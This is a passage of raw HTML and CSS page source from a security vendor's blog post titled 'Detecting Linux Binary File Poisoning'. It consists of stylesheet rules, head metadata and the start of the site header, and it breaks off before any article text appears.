ease;z-index:6}.ss--menu__item--button:focus,.ss--menu__item--button:hover{background:#0cf0d5}.ss--menu__item--button:active{background:#0be1c8}.ss--menu__item--button .ss--menu__link{font-size:1.125rem;line-height:normal;padding:.6em 1.5em}.ss--menu__item--button .ss--menu__link:focus,.ss--menu__item--button .ss--menu__link:hover{opacity:1}.ss--menu__item--button .ss--menu__link--parent{color:#2b2b2e}.ss--menu__link{align-items:center;color:currentColor;display:flex;font-size:1rem;font-weight:600;letter-spacing:.09375rem;line-height:1;padding:.5em 1em;position:relative;text-decoration:none;transition:color .25s ease,opacity .25s ease;z-index:2}.ss--menu__link:focus,.ss--menu__link:hover{opacity:.8}@media screen and (min-width:87.5em){.ss--menu__link{font-size:1.125rem}}.ss--menu__link>svg{font-size:1rem;height:1em;margin-left:.125rem;width:1em}.ss--menu__link--parent{color:#21f4db}.ss--menu-icon{align-items:center;background:none;border:0;color:currentColor;display:flex;font-size:3.125rem;overflow:visible;padding:0}.ss--menu-icon svg{font-size:var(--header-button-size);height:1em;width:1em}.ss--menu-item{display:block;margin:0;position:relative}.ss--menu-item__back,.ss--menu-item__icon{height:1em}.ss--menu-item__back{margin-right:.5rem}.ss--menu-item a,.ss--menu-item button{cursor:pointer;padding:.5rem 0}.ss--menu-item--is-mobile a,.ss--menu-item--is-mobile button{font-weight:600;padding:.75rem 0}.ss--menu-item--is-mobile a>span,.ss--menu-item--is-mobile button>span{align-items:center;display:flex;justify-content:space-between}.ss--menu-item--is-mobile a>span>span,.ss--menu-item--is-mobile button>span>span{align-items:center;display:flex}.ss--menu-item--is-mobile a>span svg,.ss--menu-item--is-mobile button>span svg{font-size:2rem}.ss--menu-item--is-back a>span,.ss--menu-item--is-back button>span{justify-content:normal;margin-left:-.4285714286rem}.ss--menu-item--is-back a>span>span,.ss--menu-item--is-back button>span>span{line-height:1;margin-left:.375rem}.ss--menu-item--is-back .ss--menu-item--active,.ss--menu-item--is-back .ss--menu-item--current{--button-bg-color:#2b2b2e}.ss--menu-item--active,.ss--menu-item--current{--button-text-color:#1ec7b3;--button-bg-color:transparent;--button-bg-hover:transparent;--button-bg-active:transparent}.ss--pagination{align-items:center;display:flex;justify-content:space-between;margin:0 auto;max-width:73.125rem;padding:0 1.25rem}@media screen and (min-width:75em){.ss--pagination{justify-content:normal;padding:0}}.ss--pagination__next,.ss--pagination__previous{align-items:center;display:flex}.ss--pagination a{color:#2b2b2e}.ss--pagination a:not(:first-of-type):not(:last-of-type){padding:0 1.25rem}.ss--pagination a:first-of-type{padding:0 1.25rem 0 0}.ss--pagination a:last-of-type{padding:0 0 0 1.25rem}.ss--pagination a>svg{font-size:1.5rem;height:1em;width:1em}.ss--pagination a[aria-current]{color:#21f4db}.ss--post-card__image-frame{position:relative}.ss--post-card__logo{bottom:1.25rem;left:1.25rem;position:absolute}.ss--post-card__content{padding:1.25rem}.ss--post-card__tags{color:#c3c4c9;display:block;margin-bottom:1rem;margin-top:.25rem}.ss--post-card__tags>*{border:2px solid;border-radius:1em;display:inline-block;font-size:.875rem;line-height:1;padding:.25em 1em}.ss--post-card__meta{font-weight:600;margin-bottom:.5rem}.ss--post-card__excerpt{flex-grow:1}.ss--post-card__title.ss--post-card__title.ss--post-card__title{margin-bottom:.25rem}.ss--post-card__title.ss--post-card__title.ss--post-card__title>a{color:currentColor}.ss--post-intro__date,.ss--post-intro__tags,.ss--post-intro__tags>a{font-weight:500}.ss--post-intro__meta dt{clip:rect(0,0,0,0)!important;border:0!important;height:1px!important;overflow:hidden!important;padding:0!important;position:absolute!important;white-space:nowrap!important;width:1px!important}.ss--post-intro__meta dd,.ss--post-intro__meta dl{display:inline-block}.ss--post-intro__meta dd{font-weight:600;margin:0}.ss--post-intro__meta dl:not(:first-child):before{color:#21f4db;content:"·";display:inline-block;margin:0 .5em}.ss--post-intro__tag.ss--post-intro__tag{border:2px solid;border-radius:1em;display:inline-block;font-size:.875rem;line-height:1;padding:.25em 1em}.ss--slider{margin:0 auto;max-width:49.25rem}.ss--slider input[type=range]{-moz-appearance:none;-webkit-appearance:none;background:#f6f6f8;border-radius:.25rem;height:6px;margin:.9375rem 0;outline:none;width:100%}.ss--slider input[type=range]::-webkit-slider-thumb{-webkit-appearance:none;background:linear-gradient(135deg,#21f4db 40%,#91d0ff);border-radius:50em;box-shadow:0 .1875rem .375rem 0 hsla(0,0%,8%,.08),0 .1875rem .375rem 0 hsla(0,0%,8%,.08);cursor:pointer;height:1rem;width:1rem}.ss--slider input[type=range]::-moz-range-thumb{-webkit-appearance:none;background:linear-gradient(135deg,#21f4db 40%,#91d0ff);border-radius:50em;box-shadow:0 .1875rem .375rem 0 hsla(0,0%,8%,.08),0 .1875rem .375rem 0 hsla(0,0%,8%,.08);cursor:pointer;height:1rem;width:1rem}.ss--slider input[type=range]::-ms-thumb{-webkit-appearance:none;background:linear-gradient(135deg,#21f4db 40%,#91d0ff);border-radius:50em;box-shadow:0 .1875rem .375rem 0 hsla(0,0%,8%,.08),0 .1875rem .375rem 0 hsla(0,0%,8%,.08);cursor:pointer;height:1rem;margin-top:0;width:1rem}.ss--slider__number{margin:0 auto;max-width:20%}.ss--slider__number input{-webkit-appearance:none;appearance:none;border:2px solid;border-radius:.25rem;box-sizing:border-box;display:block;height:2.8125rem;margin-top:.3125rem;padding:.75em 1em;width:100%}.ss--slider__number input::placeholder{opacity:.4}.ss--slider__price{padding-top:1.25rem}.ss--slider label{clip:rect(0,0,0,0)!important;border:0!important;height:1px!important;overflow:hidden!important;padding:0!important;position:absolute!important;white-space:nowrap!important;width:1px!important}.ss--share{color:#1ec7b3}.ss--share svg{font-size:2.1875rem;height:1em;width:1em}.ss--share svg:focus,.ss--share svg:hover{color:#0cf0d5}.ss--share button{align-items:center}.ss--share button:first-child:nth-last-child(n+4),.ss--share button:first-child:nth-last-child(n+4)~button{margin-top:1.25rem}.ss--share button:not(:last-child){margin-right:1.25rem}.ss--share button,.ss--share__icons{display:flex;flex-direction:row}.ss--share__icons{margin:auto 0}.ss--share__heading{color:#141414;font-size:1.575rem;line-height:1.4;margin:0 0 .625rem}.ss--spacer{padding:1.25rem 0;position:relative}.ss--spacer--padding-double{padding:2.5rem 0}.ss--table{align-content:center;display:flex;margin:0;max-width:calc(100vw - 2.5rem);overflow-x:scroll;table-layout:fixed;text-align:left}@media screen and (min-width:75em){.ss--table{overflow:hidden}}.ss--table__good{fill:#21f4db}.ss--table__bad{fill:#f44336}.ss--table__na{fill:#c3c4c9;opacity:.5}.ss--table table{border-collapse:collapse;margin:auto;width:100%}.ss--table thead{font-family:Inter,Arial,sans-serif;font-size:1.5rem;text-align:center}.ss--table thead th{border-bottom:2px solid #c3c4c9;font-weight:400;text-align:center}.ss--table td,.ss--table th{border-bottom:1px solid #f6f6f8;min-width:10rem;padding:1rem}@media print,screen and (min-width:64em){.ss--table td,.ss--table th{max-width:100%;min-width:2rem;white-space:normal}}.ss--table tbody{margin:0 1rem}.ss--table tbody tr{border-bottom:1px solid #c3c4c9}.ss--table tbody tr:last-of-type{border-bottom:unset}.ss--table tbody tr th:first-child{font-weight:600;text-align:left}@media print,screen and (min-width:64em){.ss--table tbody tr th:first-child{font-size:1.5rem}}.ss--table tbody tr td{text-align:center}.ss--table tfoot td{border-bottom:0}.ss--table__wrapper{margin:0 auto 1.25rem;max-width:90rem;padding:0;width:100%}.ss--table--widthsmall .ss--table__wrapper{max-width:48rem}.ss--table--width-medium .ss--table__wrapper{max-width:73.125rem}.ss--table--width-large .ss--table__wrapper{max-width:90rem}.ss--table--gutters{margin:auto;max-width:calc(100vw - 2.5rem)}.ss--table--bordered{border:2px solid;border-radius:.25rem}.ss--table--bordered .ss--table__wrapper{margin-bottom:0}.ss--testimonial{text-align:center}.ss--testimonial blockquote{margin:0 0 1.25rem}@media screen and (min-width:75em){.ss--testimonial blockquote{margin-bottom:1.25rem;margin-left:initial;margin-right:initial;margin-top:initial}}.ss--testimonial__citation cite{color:#141414}.ss--testimonial__author{margin-bottom:.4166666667rem}.ss--testimonial__author,.ss--testimonial__company,.ss--testimonial__role{display:block}.ss--testimonial__company,.ss--testimonial__role{font-weight:400}.ss--testimonial__cite{margin-bottom:1.25rem}.ss--testimonial__image{margin:0 auto 1.25rem;width:6.25rem}.ss--testimonial__image img{border-radius:50em}.ss--textarea{padding-bottom:1.25rem}.ss--textarea textarea{-webkit-appearance:none;border:2px solid;border-radius:.25rem;box-sizing:border-box;display:block;margin-top:.3125rem;max-width:100%;min-height:11.25rem;min-width:100%;padding:.75em 1em}.ss--textarea textarea::placeholder{opacity:.4}.ss--textarea label{clip:rect(0,0,0,0)!important;border:0!important;height:1px!important;overflow:hidden!important;padding:0!important;position:absolute!important;white-space:nowrap!important;width:1px!important}.ss--video{display:flex;flex-direction:column;justify-content:center;position:relative}.ss--video>div{height:0!important;overflow:hidden;padding-bottom:56.25%;padding-top:35px;position:relative;width:unset!important}.ss--video iframe{border-radius:.5rem;height:100%;left:0;position:absolute;top:0;width:100%}.ss--video--elevated>div{box-shadow:0 2.8px 2.2px rgba(0,0,0,.02),0 6.7px 5.3px rgba(0,0,0,.028),0 12.5px 10px rgba(0,0,0,.035),0 22.3px 17.9px rgba(0,0,0,.042),0 41.8px 33.4px rgba(0,0,0,.05),0 100px 80px rgba(0,0,0,.07)}.ss--video-with-content{display:flex;flex-direction:column-reverse;gap:1.25rem;margin:0 auto;max-width:73.125rem}@media print,screen and (min-width:64em){.ss--video-with-content{display:grid;gap:2.5rem;grid-template-columns:repeat(2,1fr)}}.ss--video-with-content--gutters{padding-left:1.25rem;padding-right:1.25rem}@media screen and (min-width:75em){.ss--video-with-content--gutters{padding-left:0;padding-right:0}}.ss--video-with-content--video-left>div{grid-row:1/2}.ss--video-with-content--video-left>div:first-of-type{grid-column:2/3}.ss--video-with-content--video-left>div:last-of-type{grid-column:1/2}.ss--card{text-align:center}.ss--card__content{padding:2.5rem}:root{--surface-bg:#fff}.ss--surface{background:var(--surface-bg);background-image:linear-gradient(135deg,#21f4db 40%,#91d0ff);border-radius:.5rem;height:100%;overflow:hidden}.ss--document-cta .ss--surface{overflow:visible}.ss--surface--primary{background-image:linear-gradient(135deg,#21f4db 40%,#91d0ff);color:#141414}.ss--surface--secondary{--surface-bg:#c3c4c9 color:$black}.ss--surface--white{background:#fff}.ss--surface--black,.ss--surface--white{border:2px solid #141414;box-shadow:inset 0 1px 63px 0 rgba(0,0,0,.05)}.ss--surface--black{--surface-bg:#141414;background-image:none;color:#fff}.ss--surface--slate{background:#2b2b2e;box-shadow:0 2.8px 2.2px rgba(0,0,0,.02),0 6.7px 5.3px rgba(0,0,0,.028),0 12.5px 10px rgba(0,0,0,.035),0 22.3px 17.9px rgba(0,0,0,.042),0 41.8px 33.4px rgba(0,0,0,.05),0 100px 80px rgba(0,0,0,.07);color:#fff}.ss--surface--default{background:#f6f6f8;color:#141414}.ss--surface--default,.ss--surface--none{box-shadow:inset 0 1px 63px 0 rgba(0,0,0,.05)}.ss--surface--border,.ss--surface--none{background:transparent}.ss--surface--border{background:linear-gradient(var(--surface-bg),var(--surface-bg)) padding-box,linear-gradient(45deg,#91d0ff,#9a94f5) border-box;border:2px solid transparent;box-shadow:none}.ss--surface--pattern{position:relative}.ss--surface--pattern:before{background:url(/bg-pattern.svg) repeat-y 240% 104%;content:" ";display:block;inset:0;pointer-events:none;position:absolute}@media print,screen and (min-width:43.75em){.ss--surface--small-only{background:unset;border:unset;box-shadow:unset}}@media screen and (max-width:43.74875em){.ss--surface--medium-up{background:unset;border:unset;box-shadow:unset}}.ss--surface--elevated{box-shadow:0 2.8px 2.2px rgba(0,0,0,.02),0 6.7px 5.3px rgba(0,0,0,.028),0 12.5px 10px rgba(0,0,0,.035),0 22.3px 17.9px rgba(0,0,0,.042),0 41.8px 33.4px rgba(0,0,0,.05),0 100px 80px rgba(0,0,0,.07)}.ss--profile{color:#141414;font-size:1rem;margin:1.25rem auto}.ss--profile__wrapper{align-items:stretch;display:flex;flex-direction:column}@media print,screen and (min-width:43.75em){.ss--profile__wrapper{flex-direction:row}}.ss--profile__images{align-items:center;display:flex;justify-content:flex-start;margin-bottom:.625rem;position:relative}@media print,screen and (min-width:43.75em){.ss--profile__images{align-items:center;flex-direction:row;min-width:10rem;padding-left:0}}.ss--profile__greeting{font-style:italic}.ss--profile__image,.ss--profile__logo{border-radius:50%;overflow:hidden}.ss--profile__image{margin:0;position:relative}.ss--profile__logo:nth-child(2){margin-left:.625rem}@media print,screen and (min-width:43.75em){.ss--profile__content{padding:0 1.25rem;text-align:left}}.ss--profile__content p:last-child{margin-bottom:0}.ss--profile__name,.ss--profile__role{margin-bottom:.25em}.ss--profile__role{line-height:1.2}.ss--profile__bio{font-size:.875rem}.ss--profile--staff{background:#c3c4c9;border-radius:.5rem;box-shadow:0 2.8px 2.2px rgba(0,0,0,.02),0 6.7px 5.3px rgba(0,0,0,.028),0 12.5px 10px rgba(0,0,0,.035),0 22.3px 17.9px rgba(0,0,0,.042),0 41.8px 33.4px rgba(0,0,0,.05),0 100px 80px rgba(0,0,0,.07);color:#fff;height:calc(100% - 2.5rem);height:100%;margin-bottom:0;margin-top:0;overflow:hidden;position:relative;text-align:center;width:100%}.ss--profile--staff .ss--profile__wrapper{align-items:flex-start;flex-direction:column;height:17.1875rem}.ss--profile--staff .ss--profile__images{margin-bottom:0;position:relative;width:100%}.ss--profile--staff .ss--profile__images:after{background:linear-gradient(135deg,#21f4db 40%,#91d0ff);bottom:50%;content:"";display:block;left:0;right:0;top:0}.ss--profile--staff .ss--profile__image{margin:1.25rem auto 0;max-width:10rem}.ss--profile--staff .ss--profile__content{padding:1.25rem;text-align:inherit;width:100%}.ss--profile--staff .ss--profile__logo{bottom:0;left:50%;opacity:.5;position:absolute;width:4rem}.ss--profile--staff .ss--profile__name{font-size:1.25rem;font-weight:700;overflow:hidden;text-overflow:ellipsis;white-space:nowrap}.ss--profile--staff .ss--profile__bio{height:17.1875rem;left:0;opacity:0;overflow:scroll;padding:.625rem;position:absolute;right:0;top:100%}body{background-color:#fff;color:#2b2b2e;font-weight:500}body,h1,h2,h3,h4,h5,h6{font-family:Inter,Arial,sans-serif}h1,h2,h3,h4,h5,h6{font-weight:700}h1,h2,h3,h4,h5,h6,p{margin-top:0}h1{font-size:2.625rem;font-weight:500;letter-spacing:-.01em;line-height:1.4;margin-bottom:1.6625rem}.ss--document-cta__title,h2,h3{line-height:1.25;margin-bottom:1.25rem}.ss--document-cta__title,h2{font-size:2rem;font-weight:600;letter-spacing:-.01em}h3{font-size:1.575rem;font-weight:600;line-height:1.4}h4{font-size:1rem;line-height:1.66rem}a{text-decoration:none}blockquote,cite,p{line-height:1.5}blockquote{font-size:1.3125rem;font-weight:700;margin-top:0}blockquote>p:before{content:"“"}blockquote>p:after{content:"”"}blockquote>footer,cite{font-size:1.125rem;font-style:normal;font-weight:600}figcaption{font-size:.875rem;margin-bottom:1rem}hr{border-color:#2b2b2e;border-radius:1px;border-width:1px}ol{margin:0;padding:0 0 0 1rem}pre{background:#f6f6f8;border-radius:.25rem;box-shadow:0 .1875rem .375rem 0 hsla(0,0%,8%,.08),0 .1875rem .375rem 0 hsla(0,0%,8%,.08);font-size:.875rem;margin-top:0;overflow:scroll;padding:1.25rem}code{font-family:Roboto Mono,monospace}p code{background:#f6f6f8;font-size:.875rem;margin-top:0;overflow:scroll;padding:.625rem 1.25rem}abbr[title]{text-decoration:none}hr{margin-bottom:2.5rem;margin-top:2.5rem;min-width:4rem}strong{font-weight:600}figure{margin-left:0;margin-right:0}figcaption{font-style:italic;margin-top:.625rem;opacity:.8;text-align:center}.ss--grecaptcha-badge{visibility:hidden}.ss--document-cta{filter:drop-shadow(0 10.8px 20px rgba(0,0,0,.12));margin:0 auto;max-width:74.375rem;overflow:hidden}@media print,screen and (min-width:64em){.ss--document-cta{padding-top:4rem}}.ss--document-cta__wrapper{grid-column-gap:1.25rem;display:grid;grid-template-columns:1fr;grid-template-rows:1fr;padding:2.5rem}@media print,screen and (min-width:64em){.ss--document-cta__wrapper{grid-template-columns:3.5fr 3fr}}.ss--document-cta__cover{display:none;position:relative}@media print,screen and (min-width:64em){.ss--document-cta__cover{display:block}}.ss--document-cta__cover:after{background:#141414;bottom:calc(-2.5rem - 1px);content:"";display:block;height:1px;position:absolute;width:100%;z-index:10}.ss--document-cta__content{padding-bottom:1.25rem}.ss--document-cta__paper{background:#f6f6f8;border-radius:.25rem;box-shadow:calc(2rem - 1px) calc(2rem + 1px) 0 0 #ebecee,2rem 2.1875rem .375rem 0 hsla(0,0%,8%,.12),2rem 2.1875rem 2.375rem 0 hsla(0,0%,8%,.12);left:2rem;padding:1.25rem;position:absolute;right:2rem;top:-6rem;transition:transform .25s ease;z-index:10}:hover>div>.ss--document-cta__paper{transform:translateY(-.25rem)}.ss--document-cta__body{font-size:1.25rem}.ss--document-cta__cover-title{position:relative}.ss--document-cta__cover-title h3{margin-bottom:0}.ss--document-cta__image{border:2px solid #e8e9ec;border-radius:.25rem}.ss--swatch{background-color:#fff;color:#141414;text-align:center}.ss--swatch__content{padding:1.25rem}.ss--swatch__sample{aspect-ratio:1/1}.ss--swatch--size-small{font-size:.875rem}.ss--swatch--size-small h4{font-size:inherit;margin-bottom:0}.ss--staff{font-size:1rem}.ss--staff__wrapper{margin:0 auto;max-width:74.375rem;padding:0 1.25rem}.ss--staff__list{align-items:stretch;display:flex;flex-wrap:wrap;justify-content:center}.ss--staff__item{margin:0 .625rem 1.25rem;max-width:17.1875rem;min-width:16.25rem;width:100%}.ss--staff--center{text-align:center}.ss--notification{align-items:center;display:flex;flex-direction:row;justify-content:space-around;position:relative}.ss--notification a,.ss--notification button{color:currentColor;transition:opacity .2s linear}.ss--notification a:active,.ss--notification a:focus,.ss--notification a:hover,.ss--notification button:active,.ss--notification button:focus,.ss--notification button:hover{opacity:.8}.ss--notification button{background:transparent;border:0;bottom:0;cursor:pointer;left:0;padding:.625rem;position:absolute;top:0}.ss--notification__content{align-items:center;display:flex;flex-direction:row;font-size:.875rem;font-weight:600;letter-spacing:.05em;margin:auto;padding:.625rem 2.5rem;text-align:center;text-transform:uppercase}.ss--notification__title{font-family:Inter,Arial,sans-serif;line-height:1}.ss--notification__button{display:inline-flex}.ss--notification__cta{font-family:Inter,Arial,sans-serif;line-height:1;margin-left:.5rem}.ss--notification__icon{height:1rem;margin-left:.5rem;width:1rem}.ss--notification--default{background-color:#fff;color:#141414}.ss--notification--default .ss--notification__cta,.ss--notification--default .ss--notification__icon{color:#21f4db}.ss--notification--accent{background:#21f4db;color:#fff}.ss--notification--gradient{background:linear-gradient(135deg,#21f4db 40%,#91d0ff);color:#141414}.ss--notification--primary{background-color:#21f4db;color:#fff}.ss--notification--alert{background-color:#f44336;color:#fff}.ss--notification--warning{background-color:#fdb11f;color:#fff}.ss--licenses-item{display:flex;flex-direction:column;height:100%;justify-content:space-between;min-width:300px;padding:2.5rem;text-align:center}@media print,screen and (min-width:43.75em){.ss--licenses-item{min-height:685px}}.ss--licenses-item a:not(.ss--button){color:currentColor;text-decoration:underline}.ss--licenses-item__heading{margin-bottom:.25rem}.ss--licenses-item__price{font-size:2rem}@media print,screen and (min-width:43.75em){.ss--licenses-item__price{font-size:2.75rem;line-height:1.125}}.ss--licenses-item__badge{color:#21f4db;font-family:Inter,Arial,sans-serif;font-size:.875em;font-weight:700;letter-spacing:.25em;padding:.25em .5em;position:absolute;text-transform:uppercase;transform:translateX(-2rem) rotate(20deg)}.ss--licenses-item__desc{margin-bottom:2rem}.ss--licenses-item__features{font-size:1.125rem;list-style:none;margin:0;opacity:.64;padding:0}.ss--licenses-item__features li{margin-bottom:1rem}.ss--licenses-item__action{min-height:5.75rem}.ss--licenses-item__note{margin-top:.5rem}@media print,screen and (min-width:43.75em){.ss--licenses-item--free .ss--licenses-item__hero,.ss--licenses-item--no-price .ss--licenses-item__hero{padding-bottom:4rem}}.ss--licenses-item--masked .ss--licenses-item__price{display:block;font-size:2rem;padding-bottom:1.25rem}:root{--primary-color:#21f4db}.ss--licenses{align-items:stretch;display:flex;flex-direction:row;flex-wrap:wrap;gap:1.25rem;justify-content:center;margin:0 auto;max-width:74.375rem;padding-left:1.25rem;padding-right:1.25rem}.ss--licenses a:not(.ss--button){color:currentColor;text-decoration:underline}.ss--licenses__item-heading{background-color:#21f4db;border-radius:3rem;color:#fff;font-size:1rem;font-weight:400;margin:0 auto 1.5rem;max-width:12.5rem;padding:.625rem}.ss--licenses__item-description{font-size:1.125rem}.ss--licenses__item-features{font-size:1.125rem;list-style:none;opacity:.64;padding:0}.ss--licenses__item-features li{margin-bottom:1rem}.ss--licenses__free,.ss--licenses__paid{max-width:30rem;width:100%}.ss--licenses__item-note{margin-top:.5rem}</style><title data-gatsby-head="true">Detecting Linux Binary File Poisoning | Sandfly Security</title><link rel="apple-touch-icon" sizes="57x57" href="https://www.datocms-assets.com/56687/1657854301-favicon-white-copy-2x.png?w=57&amp;h=57" data-gatsby-head="true"/><link rel="apple-touch-icon" sizes="60x60" href="https://www.datocms-assets.com/56687/1657854301-favicon-white-copy-2x.png?w=60&amp;h=60" data-gatsby-head="true"/><link rel="apple-touch-icon" sizes="72x72" href="https://www.datocms-assets.com/56687/1657854301-favicon-white-copy-2x.png?w=72&amp;h=72" data-gatsby-head="true"/><link rel="apple-touch-icon" sizes="76x76" href="https://www.datocms-assets.com/56687/1657854301-favicon-white-copy-2x.png?w=76&amp;h=76" data-gatsby-head="true"/><link rel="apple-touch-icon" sizes="114x114" href="https://www.datocms-assets.com/56687/1657854301-favicon-white-copy-2x.png?w=114&amp;h=114" data-gatsby-head="true"/><link rel="apple-touch-icon" sizes="120x120" href="https://www.datocms-assets.com/56687/1657854301-favicon-white-copy-2x.png?w=120&amp;h=120" data-gatsby-head="true"/><link rel="apple-touch-icon" sizes="144x144" href="https://www.datocms-assets.com/56687/1657854301-favicon-white-copy-2x.png?w=144&amp;h=144" data-gatsby-head="true"/><link rel="apple-touch-icon" sizes="152x152" href="https://www.datocms-assets.com/56687/1657854301-favicon-white-copy-2x.png?w=152&amp;h=152" data-gatsby-head="true"/><link rel="apple-touch-icon" sizes="180x180" href="https://www.datocms-assets.com/56687/1657854301-favicon-white-copy-2x.png?w=180&amp;h=180" data-gatsby-head="true"/><link rel="icon" sizes="16x16" href="https://www.datocms-assets.com/56687/1657854301-favicon-white-copy-2x.png?w=16&amp;h=16" type="image/png" data-gatsby-head="true"/><link rel="icon" sizes="32x32" href="https://www.datocms-assets.com/56687/1657854301-favicon-white-copy-2x.png?w=32&amp;h=32" type="image/png" data-gatsby-head="true"/><link rel="icon" sizes="96x96" href="https://www.datocms-assets.com/56687/1657854301-favicon-white-copy-2x.png?w=96&amp;h=96" type="image/png" data-gatsby-head="true"/><link rel="icon" sizes="192x192" href="https://www.datocms-assets.com/56687/1657854301-favicon-white-copy-2x.png?w=192&amp;h=192" type="image/png" data-gatsby-head="true"/><style data-emotion="css-global luwlqw">html{-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale;box-sizing:border-box;-webkit-text-size-adjust:100%;}*,*::before,*::after{box-sizing:inherit;}strong,b{font-weight:700;}body{margin:0;color:rgba(0, 0, 0, 0.87);font-family:Inter,sans-serif;font-weight:400;font-size:1rem;line-height:1.5;background-color:#ffffff;}@media print{body{background-color:#ffffff;}}body::backdrop{background-color:#ffffff;}</style><style data-emotion="css 8atqhb 1qm1lh 1deacqj">.css-8atqhb{width:100%;}.css-1qm1lh{margin-bottom:16px;}.css-1deacqj{display:-webkit-inline-box;display:-webkit-inline-flex;display:-ms-inline-flexbox;display:inline-flex;-webkit-align-items:center;-webkit-box-align:center;-ms-flex-align:center;align-items:center;-webkit-box-pack:center;-ms-flex-pack:center;-webkit-justify-content:center;justify-content:center;position:relative;box-sizing:border-box;-webkit-tap-highlight-color:transparent;background-color:transparent;outline:0;border:0;margin:0;border-radius:0;padding:0;cursor:pointer;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;user-select:none;vertical-align:middle;-moz-appearance:none;-webkit-appearance:none;-webkit-text-decoration:none;text-decoration:none;color:inherit;text-align:center;-webkit-flex:0 0 auto;-ms-flex:0 0 auto;flex:0 0 auto;font-size:1.5rem;padding:8px;border-radius:50%;overflow:visible;color:rgba(0, 0, 0, 0.54);-webkit-transition:background-color 150ms cubic-bezier(0.4, 0, 0.2, 1) 0ms;transition:background-color 150ms cubic-bezier(0.4, 0, 0.2, 1) 0ms;color:inherit;}.css-1deacqj::-moz-focus-inner{border-style:none;}.css-1deacqj.Mui-disabled{pointer-events:none;cursor:default;}@media print{.css-1deacqj{-webkit-print-color-adjust:exact;color-adjust:exact;}}.css-1deacqj:hover{background-color:rgba(0, 0, 0, 0.04);}@media (hover: none){.css-1deacqj:hover{background-color:transparent;}}.css-1deacqj.Mui-disabled{background-color:transparent;color:rgba(0, 0, 0, 0.26);}</style><style>.gatsby-image-wrapper{position:relative;overflow:hidden}.gatsby-image-wrapper picture.object-fit-polyfill{position:static!important}.gatsby-image-wrapper img{bottom:0;height:100%;left:0;margin:0;max-width:none;padding:0;position:absolute;right:0;top:0;width:100%;object-fit:cover}.gatsby-image-wrapper [data-main-image]{opacity:0;transform:translateZ(0);transition:opacity .25s linear;will-change:opacity}.gatsby-image-wrapper-constrained{display:inline-block;vertical-align:top}</style><noscript><style>.gatsby-image-wrapper noscript [data-main-image]{opacity:1!important}.gatsby-image-wrapper [data-placeholder-image]{opacity:0!important}</style></noscript><script type="module">const e="undefined"!=typeof HTMLImageElement&&"loading"in HTMLImageElement.prototype;e&&document.body.addEventListener("load",(function(e){const t=e.target;if(void 0===t.dataset.mainImage)return;if(void 0===t.dataset.gatsbyImageSsr)return;let a=null,n=t;for(;null===a&&n;)void 0!==n.parentNode.dataset.gatsbyImageWrapper&&(a=n.parentNode),n=n.parentNode;const o=a.querySelector("[data-placeholder-image]"),r=new Image;r.src=t.currentSrc,r.decode().catch((()=>{})).then((()=>{t.style.opacity=1,o&&(o.style.opacity=0,o.style.transition="opacity 500ms linear")}))}),!0);</script><link rel="preload" as="font" type="font/woff2" crossorigin="anonymous" href="/static/webfonts/s/inter/v12/UcCO3FwrK3iLTeHuS_fvQtMwCp50KnMw2boKoduKmMEVuI6fAZ9hiA.woff2"/><link rel="preload" as="font" type="font/woff2" crossorigin="anonymous" href="/static/webfonts/s/inter/v12/UcCO3FwrK3iLTeHuS_fvQtMwCp50KnMw2boKoduKmMEVuGKYAZ9hiA.woff2"/><link rel="preload" as="font" type="font/woff2" crossorigin="anonymous" href="/static/webfonts/s/inter/v12/UcCO3FwrK3iLTeHuS_fvQtMwCp50KnMw2boKoduKmMEVuFuYAZ9hiA.woff2"/><link rel="preload" as="font" type="font/woff2" crossorigin="anonymous" href="/static/webfonts/s/robotomono/v22/L0xoDF4xlVMF-BfR8bXMIjhOsXG-q2oeuFoqFrlnANW6Cpk.woff2"/><link rel="preload" as="font" type="font/woff2" crossorigin="anonymous" href="/static/webfonts/s/robotomono/v22/L0xuDF4xlVMF-BfR8bXMIhJHg45mwgGEFl0_3vq_ROW4.woff2"/><style>@font-face{font-display:swap;font-family:Inter;font-style:normal;font-weight:500;src:url(/static/webfonts/s/inter/v12/UcCO3FwrK3iLTeHuS_fvQtMwCp50KnMw2boKoduKmMEVuI6fAZ9hiA.woff2) format("woff2")}@font-face{font-display:swap;font-family:Inter;font-style:normal;font-weight:600;src:url(/static/webfonts/s/inter/v12/UcCO3FwrK3iLTeHuS_fvQtMwCp50KnMw2boKoduKmMEVuGKYAZ9hiA.woff2) format("woff2")}@font-face{font-display:swap;font-family:Inter;font-style:normal;font-weight:700;src:url(/static/webfonts/s/inter/v12/UcCO3FwrK3iLTeHuS_fvQtMwCp50KnMw2boKoduKmMEVuFuYAZ9hiA.woff2) format("woff2")}@font-face{font-display:swap;font-family:Roboto Mono;font-style:italic;font-weight:400;src:url(/static/webfonts/s/robotomono/v22/L0xoDF4xlVMF-BfR8bXMIjhOsXG-q2oeuFoqFrlnANW6Cpk.woff2) format("woff2")}@font-face{font-display:swap;font-family:Roboto Mono;font-style:normal;font-weight:400;src:url(/static/webfonts/s/robotomono/v22/L0xuDF4xlVMF-BfR8bXMIhJHg45mwgGEFl0_3vq_ROW4.woff2) format("woff2")}</style><link rel="alternate" type="application/rss+xml" title="Sandfly Security Blog RSS Feed" href="/blog/rss.xml"/><link rel="preconnect" href="https://www.googletagmanager.com"/><link rel="dns-prefetch" href="https://www.googletagmanager.com"/><script type="text/javascript" src="https://www.google.com/recaptcha/enterprise.js?render=6LeG2j4jAAAAAKHXU1FYkXv90S_r3ZU6znFG6Cyo"></script></head><body><div id="___gatsby"><div style="outline:none" tabindex="-1" id="gatsby-focus-wrapper"><div id="layout" class="layout"><div class="headroom-wrapper"><div class="headroom headroom--unfixed"><header class="ss--header"><div><div class="ss--notification ss--notification--gradient"><a href="/blog/sandfly-4-5-0-powerful-new-expression-syntax/"><div class="ss--notification__content"><div class="ss--notification__title">Sandfly 4.5.0 - Powerful New Expression Syntax<span class="ss--notification__button"><div class="ss--notification__cta">Learn more</div><div class="ss--notification__icon"><svg stroke="currentColor" fill="currentColor" stroke-width="0" viewBox="0 0 16 16" height="1em" width="1em" xmlns="http://www.w3.org/2000/svg"><path fill-rule="evenodd" d="M1 8a.5.5 0 0 1 .5-.5h11.793l-3.147-3.146a.5.5 0 0 1 .708-.708l4 4a.5.5 0 0 1 0 .708l-4 4a.5.5 0 0 1-.708-.708L13.293 8.5H1.5A.5.5 0 0 1 1 8z"></path></svg></div></span></div></div></a><button aria-label="Close Notification"><svg stroke="currentColor" fill="currentColor" stroke-width="0" viewBox="0 0 24 24" height="1em" 